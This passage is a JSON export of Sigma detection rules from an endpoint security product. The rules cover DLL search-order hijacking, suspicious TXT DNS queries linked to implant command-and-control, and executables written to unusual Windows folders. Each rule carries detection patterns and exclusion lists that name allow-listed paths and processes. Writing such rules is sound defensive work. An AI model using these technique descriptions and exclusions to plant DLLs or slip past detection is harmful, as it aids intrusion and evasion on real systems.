Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "112484b0-ac5d-40a8-a775-0a918f1aa7f1", "rule_name": "DLL Hijacking via cscript.exe", "rule_description": "Detects potential Windows DLL Hijacking via cscript.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1129f074-5b01-412c-9fae-a3a2a3b01770", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.087075Z", "creation_date": "2026-03-23T11:45:34.087078Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.087084Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east", "https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_secur32.yml", "content": "title: Suspicious secur32.dll Loaded\nid: 1129f074-5b01-412c-9fae-a3a2a3b01770\ndescription: |\n Detects loading of a suspicious DLL named 'secur32.dll' by a process that could be a target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/05\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\secur32.dll'\n sha256|contains: '?' # At least one character, some SHA256 are empty\n\n filter_signed_microsoft:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_commonfolders:\n ImageLoaded:\n - '?:\\Windows\\WinSxS\\\\*'\n - '?:\\Windows\\System32\\secur32.dll'\n - '?:\\Windows\\syswow64\\secur32.dll'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\secur32.dll'\n - '*\\docker\\windowsfilter\\\\*\\files\\windows\\syswow64\\secur32.dll'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\System32\\secur32.dll'\n - '*\\docker\\data\\windowsfilter\\\\*\\files\\windows\\syswow64\\secur32.dll'\n - '?:\\Windows\\SoftwareDistribution\\Download\\\\*\\secur32.dll'\n - '\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\windows\\system32\\secur32.dll'\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\secur32.dll'\n\n exclusion_siemens:\n ImageLoaded:\n - '?:\\Program Files (x86)\\Siemens\\UniCam\\UniCam FX\\Secur32.dll'\n - '?:\\PROGRA~2\\Siemens\\UniCam\\UniCam FX\\Secur32.dll'\n Image|startswith: '?:\\Program Files (x86)\\Siemens\\UniCam\\UniCam FX\\'\n\n exclusion_elisath:\n Image:\n - '?:\\Elisath\\Gestion\\Gestion.exe'\n - '?:\\Elisath\\Caisse\\Caisse.exe'\n ImageLoaded:\n - '?:\\Elisath\\Gestion\\secur32.dll'\n - '?:\\Elisath\\Caisse\\secur32.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1129f074-5b01-412c-9fae-a3a2a3b01770", "rule_name": "Suspicious secur32.dll Loaded", "rule_description": "Detects loading of a suspicious DLL named 'secur32.dll' by a process that could be a target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2024-03-05", "rule_modified_date": "2025-10-09", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1181e4c8-56a6-49c2-971f-caa5665133a3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.626425Z", "creation_date": "2026-03-23T11:45:34.626427Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.626431Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1071/004/" ], "name": "t1071_004_suspicious_txt_dns_linux.yml", "content": "title: Suspicious TXT DNS Resolution (Linux)\nid: 1181e4c8-56a6-49c2-971f-caa5665133a3\ndescription: |\n Detects a suspicious TXT DNS request that could be related to an implant communication.\n Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\n It is recommended to analyze the process at the origin of the request for malicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1071/004/\ndate: 2024/04/02\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n QueryType: 'TXT'\n QueryStatusCategory: 'success'\n TextRecords|contains: '?'\n ProcessImage|contains: '?'\n\n filter_mail:\n TextRecords|contains:\n - 'v=DKIM1'\n - 'v=spf1'\n - 'k=rsa'\n - 'v=DMARC1'\n - 'dkim=unknown'\n\n filter_site_verification:\n TextRecords|contains:\n - 'apple-domain-verification='\n - 'google-site-verification='\n - 'facebook-domain-verification='\n - 'adobe-idp-site-verification='\n - 'MS=ms????????'\n\n filter_know_requested_name:\n QueryName:\n - 'version.bind'\n - 'hostname.bind'\n\n filter_know_requested_name_endswith:\n QueryName|endswith:\n - '.local'\n - 'whoami.cloudflare.com'\n - 'o-o.myaddr.l.google.com'\n - '.psbl.surriel.com' # Passive spam blocklist\n - '.cbl.abuseat.org' # The Abuseat CBL (Composite Blocking List)\n - 'engine._segment._tcp.steelseries.com'\n - 'config.nos.avast.com.'\n - 'config.nos.avast.com'\n - '_nos._tcp.nos.avast.com.'\n - '_nos._tcp.nos.avast.com'\n - '.logmein-gateway.com'\n - 'current.cvd.clamav.net'\n - '.asn.rspamd.com'\n - '.asn.cymru.com'\n - 'secpoll.powerdns.com'\n - 'wgs.prod.surfshark.com'\n - 'push.apple.com'\n - '.pci.id.ucw.cz'\n - '.sophosxl.net'\n\n filter_mailer:\n - ProcessCommandLine|contains:\n - '/usr/sbin/named'\n - '/usr/local/sbin/named'\n - '/usr/sbin/amavisd'\n - '/usr/sbin/opendkim'\n - '/usr/sbin/milter-greylist'\n - '/usr/sbin/opendmarc'\n - '/usr/sbin/exim4'\n - 'MailScanner: starting child'\n - '/usr/bin/perl -U -I /usr/share/MailScanner/perl /usr/sbin/MailScanner /etc/MailScanner/MailScanner.conf'\n - '/opt/zimbra/common/sbin/amavisd'\n - 'MailScanner: ' # MailScanner: waiting for messages\n - '/usr/bin/spamd'\n - '/usr/bin/perl -T -w /usr/bin/spamd '\n - '/usr/bin/perl /usr/bin/pmg-smtp-filter'\n - 'spamd child'\n - Image:\n - '/usr/sbin/milter-greylist'\n - '/usr/lib/postfix/sbin/smtpd'\n - '/usr/libexec/postfix/smtpd'\n - '/usr/sbin/named'\n - '/usr/local/sbin/named'\n - '/usr/sbin/opendkim'\n - '/usr/sbin/opendmarc'\n - '/usr/sbin/exim'\n - '/usr/sbin/exim4'\n - '/usr/bin/rspamd'\n\n filter_dns:\n Image:\n - '/usr/sbin/named'\n - '/lib/systemd/systemd-resolved'\n - '/usr/lib/systemd/systemd-resolved'\n - '/usr/sbin/unbound'\n - '/usr/sbin/pdns_recursor'\n - '/usr/sbin/squid'\n - '/usr/sbin/nscd'\n - '/usr/sbin/dig'\n - '/usr/bin/dig'\n - '/usr/local/nessy2/bin/named'\n\n filter_amazon_ses:\n # xxx._domainkey.yyy.com , type TXT, redirects through a CNAME to xxx.dkip.amazonses.com\n QueryName: '????????????????????????????????._domainkey.*'\n TextRecords: 'p=MI*' # contains a public key\n\n exclusion_image:\n ProcessImage:\n - '/opt/nessus/sbin/nessusd'\n - '/usr/bin/figal-client'\n - '/usr/bin/figal-sitename'\n - '*/rapid7/nexpose/nsc/.DLLCACHE/nexserv'\n - '/usr/bin/mongorestore'\n - '/usr/libexec/sssd/sssd_be'\n - '/usr/sbin/lshw'\n - '/usr/local/bin/forgejo'\n - '/usr/libexec/postfix/smtpd'\n - '/opt/puppetlabs/puppet/bin/ruby'\n - '/usr/bin/cloudflared'\n - '/usr/local/bin/cloudflared'\n\n exclusion_scan:\n # version.bind\n TextRecords: 'unbound ?.??.?'\n\n exclusion_spamcop:\n TextRecords|startswith: 'Blocked - see https://www.spamcop.net/bl.shtml?'\n\n exclusion_dkim:\n TextRecords|contains:\n - 'p=MIGf'\n - 'p= MIGf'\n - 'p=MIIBIj'\n - 'p= MIIBIj'\n QueryName|contains: '._domainkey.'\n\n exclusion_brevo:\n TextRecords|contains: 'brevo-code:??????????????????????'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1181e4c8-56a6-49c2-971f-caa5665133a3", "rule_name": "Suspicious TXT DNS Resolution (Linux)", "rule_description": "Detects a suspicious TXT DNS request that could be related to an implant communication.\nAdversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\nIt is recommended to analyze the process at the origin of the request for malicious activities.\n", "rule_creation_date": "2024-04-02", "rule_modified_date": "2026-01-12", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control" ], "rule_technique_tags": [ "attack.t1071.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "118b000d-e5d7-48c7-a7cd-7f89310aa1b9", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.586261Z", "creation_date": "2026-03-23T11:45:34.586266Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.586274Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_dlpumgr32.yml", "content": "title: DLL Hijacking via dlpumgr32.exe\nid: 118b000d-e5d7-48c7-a7cd-7f89310aa1b9\ndescription: |\n Detects potential Windows DLL Hijacking via the DESlock+ User Manager executable dlpumgr32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dlpumgr32.exe'\n ProcessSignature: 'DESlock Limited'\n ImageLoaded|endswith: '\\dlpprem32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'DESlock Limited'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "118b000d-e5d7-48c7-a7cd-7f89310aa1b9", "rule_name": "DLL Hijacking via dlpumgr32.exe", "rule_description": "Detects potential Windows DLL Hijacking via the DESlock+ User Manager executable dlpumgr32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-11-04", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "118fe9fa-f27d-4da6-bee4-85f73fe9c76c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.071551Z", "creation_date": "2026-03-23T11:45:34.071553Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.071558Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1564/", "https://attack.mitre.org/techniques/T1036/" ], "name": "t1564_pe_written_suspicious_location.yml", "content": "title: PE File Written in Suspicious Location\nid: 118fe9fa-f27d-4da6-bee4-85f73fe9c76c\ndescription: |\n Detects the writing of a Portable Executable file in a suspicious location.\n Attacker can drop DLLs or PEs in unconventionnal directories to prevent security softwares or users seeing them.\n It is recommended to analyze the dropped file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2023/07/10\nmodified: 2025/11/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: filesystem_write\n product: windows\ndetection:\n selection:\n FirstBytes|startswith: '4d5a'\n\n selection_appdata_1:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\'\n filter_appdata_1:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\\\*\\'\n\n selection_appdata_2:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\'\n filter_appdata_2:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\\\*\\'\n\n selection_appdata_3:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Temp\\'\n filter_appdata_3:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\'\n\n selection_appdata_4:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\'\n\n selection_winsxs:\n Path|startswith: '?:\\Windows\\WinSxS\\'\n filter_winsxs:\n Path|startswith: '?:\\Windows\\WinSxS\\\\*\\'\n\n selection_prefetch:\n Path|startswith: '?:\\Windows\\Prefetch\\'\n filter_prefetch:\n Path|startswith: '?:\\Windows\\Prefetch\\\\*\\'\n\n selection_tasks:\n Path|startswith: '?:\\Windows\\Tasks\\'\n filter_tasks:\n Path|startswith: '?:\\Windows\\Tasks\\\\*\\'\n\n selection_system32_tasks:\n Path|startswith: '?:\\Windows\\system32\\Tasks\\'\n filter_system32_tasks:\n Path|startswith: '?:\\Windows\\system32\\Tasks\\\\*\\'\n\n selection_debug:\n Path|startswith: '?:\\Windows\\debug\\'\n filter_debug:\n Path|startswith: '?:\\Windows\\debug\\\\*\\'\n\n selection_tracing:\n Path|startswith: '?:\\Windows\\tracing\\'\n filter_tracing:\n Path|startswith: '?:\\Windows\\tracing\\\\*\\'\n\n selection_help:\n Path|startswith: '?:\\Windows\\help\\'\n filter_help:\n Path|startswith: '?:\\Windows\\help\\\\*\\'\n\n selection_logs:\n Path|startswith: '?:\\Windows\\logs\\'\n\n selection_fonts:\n Path|startswith: '?:\\Windows\\Fonts\\'\n\n selection_programdata:\n Path|startswith: '?:\\ProgramData\\'\n filter_programdata:\n Path|startswith: '?:\\ProgramData\\\\*\\'\n\n selection_user:\n Path|startswith:\n - '?:\\Users\\\\*\\Music\\'\n - '?:\\Users\\\\*\\Videos\\'\n - '?:\\Users\\\\*\\Pictures\\'\n - '?:\\Users\\\\*\\Contacts\\'\n - '?:\\Users\\\\*\\3D Objects\\'\n - '?:\\Users\\\\*\\Saved Games\\'\n - '?:\\Users\\\\*\\Links\\'\n - '?:\\Users\\\\*\\Favorites\\'\n filter_user_1:\n Path|startswith:\n - '?:\\Users\\\\*\\\\*\\Music\\'\n - '?:\\Users\\\\*\\\\*\\Videos\\'\n - '?:\\Users\\\\*\\\\*\\Pictures\\'\n - '?:\\Users\\\\*\\\\*\\Contacts\\'\n - '?:\\Users\\\\*\\\\*\\3D Objects\\'\n - '?:\\Users\\\\*\\\\*\\Saved Games\\'\n - '?:\\Users\\\\*\\\\*\\Links\\'\n - '?:\\Users\\\\*\\\\*\\Favorites\\'\n # Filtering out folders with 2 or more levels of depth\n filter_user_2:\n Path|startswith:\n - '?:\\Users\\\\*\\Music\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Videos\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Pictures\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Contacts\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\3D Objects\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Saved Games\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Links\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Favorites\\\\*\\\\*\\'\n\n selection_inf:\n Path|startswith: '?:\\Windows\\INF\\'\n\n selection_config:\n Path|startswith: '?:\\Windows\\System32\\config\\'\n filter_config:\n Path|startswith: '?:\\Windows\\System32\\config\\\\*\\'\n\n selection_evt:\n Path|startswith: '?:\\Windows\\System32\\winevt\\'\n\n selection_public:\n Path|startswith: '?:\\Users\\Public\\'\n filter_public:\n Path|startswith: '?:\\Users\\Public\\\\*\\'\n\n selection_perflogs:\n Path|startswith: '?:\\Perflogs\\'\n filter_perflogs:\n Path|startswith: '?:\\Perflogs\\\\*\\'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_qlive:\n ProcessImage|endswith: '\\QQLive.exe'\n Path: '?:\\ProgramData\\QLDZModule.dll'\n\n exclusion_sesame:\n ProcessImage|endswith: '\\Sesame.exe'\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\\\*.dll'\n\n exclusion_itextsharp:\n Path: '?:\\Windows\\Fonts\\itextsharp.dll'\n\n exclusion_logs_pbr:\n ProcessImage:\n - '?:\\Windows\\System32\\systemsettingsadminflows.exe'\n - '?:\\WINDOWS\\system32\\omadmclient.exe'\n - '?:\\Windows\\System32\\systemreset.exe'\n - '?:\\Windows\\System32\\resetengine.exe'\n Path: '?:\\Windows\\Logs\\PBR\\\\*'\n\n exclusion_fonts:\n Path:\n - '?:\\Windows\\Fonts\\\\*.fon'\n - '?:\\Windows\\Fonts\\\\*.fot'\n - '?:\\Windows\\Fonts\\\\*.rra'\n - '?:\\Windows\\Fonts\\is-*.tmp'\n\n exclusion_explorer:\n ProcessImage: '?:\\windows\\Explorer.EXE'\n\n # When downloading files from browsers they create temporary extensions for files\n # For caching and verification. This could be reduced to a \"Downloads\" folder only.\n exclusion_browser_extensions:\n Path|endswith:\n - '.crdownload' # Chrome\n - '.part' # Firefox\n - '.partial' # Edge\n - '.download' # Safari\n - '\\Downloads\\\\????????-????-????-????-????????????.tmp'\n\n exclusion_migration_service:\n Path: '?:\\ProgramData\\UserProfileMigrationService.exe'\n\n exclusion_4kviddl:\n Path|startswith: '?:\\Users\\\\*\\Music\\4kvideodownloader\\'\n\n exclusion_tmp:\n Path: '?:\\Users\\\\*\\AppData\\Local\\Z@H!-*-??.tmp'\n\n exclusion_public:\n Path:\n - '?:\\Users\\Public\\AnyDesk.exe'\n - '?:\\Users\\Public\\gcapi.dll'\n - '?:\\Users\\Public\\python.exe'\n - '?:\\Users\\Public\\splunkdd.exe'\n - '?:\\Users\\Public\\splunkd.exe'\n\n exclusion_roaming:\n Path:\n - '?:\\Users\\\\*\\AppData\\Roaming\\DPInst.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\gacutil.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\PnPutil.exe'\n\n exclusion_uninstall:\n Path:\n # Files of the following format:\n # PyCharm2023.2_232.8660.197_Uninstall.exe\n - '?:\\ProgramData\\\\*20??.?_???.????.*_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*20??.?_???.????.*_Uninstall.exe'\n\n exclusion_winscp:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\winscp.rnd'\n\n exclusion_dotnet:\n Path|startswith:\n - '?:\\Users\\\\*\\\\*\\bin\\Debug\\net*\\'\n - '?:\\Users\\\\*\\\\*\\bin\\Release\\net*\\'\n\n exclusion_rollbacks:\n Path|startswith:\n - '?:\\Windows\\Logs\\PBR\\$Windows.~BT\\MigrationShims\\MigShim2\\'\n - '?:\\Windows\\Logs\\PBR\\$Windows.~BT_Rollback\\EFI\\Microsoft\\Boot\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\\\*\\MigrationShims\\MigShim2\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\Rollback\\EFI\\Microsoft\\Boot\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\_s_????.tmp'\n - '?:\\Windows\\Logs\\PBR\\Panther\\_s_???.tmp'\n\n exclusion_anydesk_dl:\n Path|endswith: '\\Downloads\\AnyDesk.exe'\n\n exclusion_redist:\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\TempDirectX?.EXE'\n - '?:\\Users\\\\*\\AppData\\Local\\TempDirectX??.EXE'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvcredist20??_x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvcredist20??_20??_20??_x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\TempVC_redist.x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvjredist64.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvjredist.exe'\n\n exclusion_putty:\n Path: '?:\\Users\\\\*\\AppData\\Local\\PUTTY.RND'\n\n exclusion_sqlce:\n Path:\n - '?:\\Users\\\\*\\AppData\\Roaming\\sqlcecompact??.dll'\n - '?:\\Users\\\\*\\AppData\\Roaming\\sqlce????.dll'\n\n exclusion_clu:\n Path:\n - '?:\\Users\\\\*\\CLU_V*\\ComponentMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\expat.dll'\n - '?:\\Users\\\\*\\CLU_V*\\libexpat.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUdsCm.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUdsDm.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUsrApi.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RDHWebSercieMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RdsMisc.dll'\n - '?:\\Users\\\\*\\CLU_V*\\restCdom.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RESTSDK.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RFUT.exe'\n - '?:\\Users\\\\*\\CLU_V*\\RInetwrp2.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RInetwrp.dll'\n - '?:\\Users\\\\*\\CLU_V*\\ServerMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\SnmpGet.exe'\n - '?:\\Users\\\\*\\CLU_V*\\soapCdom.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapCls2.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapCls.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapDms.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapProx.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUad.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUD.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUds.dll'\n - '?:\\Users\\\\*\\CLU_V*\\unzip32.dll'\n - '?:\\Users\\\\*\\CLU_V*\\zip32.dll'\n\n exclusion_motic_drivers:\n Path|startswith: '?:\\Windows\\INF\\Motic Drivers\\'\n\n exclusion_aee_tools:\n Path: '?:\\Users\\\\*\\AppData\\Local\\AEE-Tools'\n\n exclusion_installshield_uninstallers:\n Path:\n - '?:\\ProgramData\\\\*????.?_*_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*????.?_*_Uninstall.exe'\n\n exclusion_polycom:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\PolycomCompanionSetup.exe'\n\n exclusion_bit_tmp:\n Path:\n - '?:\\ProgramData\\BIT????.tmp'\n - '?:\\ProgramData\\BIT???.tmp'\n\n exclusion_bluestacks_tmp:\n Path: '?:\\ProgramData\\BlueStacksServicesSetup.exe.tmp'\n\n exclusion_cardpresso:\n Path: '?:\\ProgramData\\cardPresso.bin'\n\n exclusion_generic_uninstaller:\n Path:\n - '?:\\ProgramData\\\\*20??.?_???.?????.??_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*20??.?_???.?????.??_Uninstall.exe'\n\n exclusion_keypass:\n Path:\n - '?:\\Users\\\\*\\KeePass Password Safe 2\\ShInstUtil.exe'\n - '?:\\Users\\\\*\\KeePass Password Safe 2\\unins000.exe'\n\n exclusion_setup_prod:\n Path: 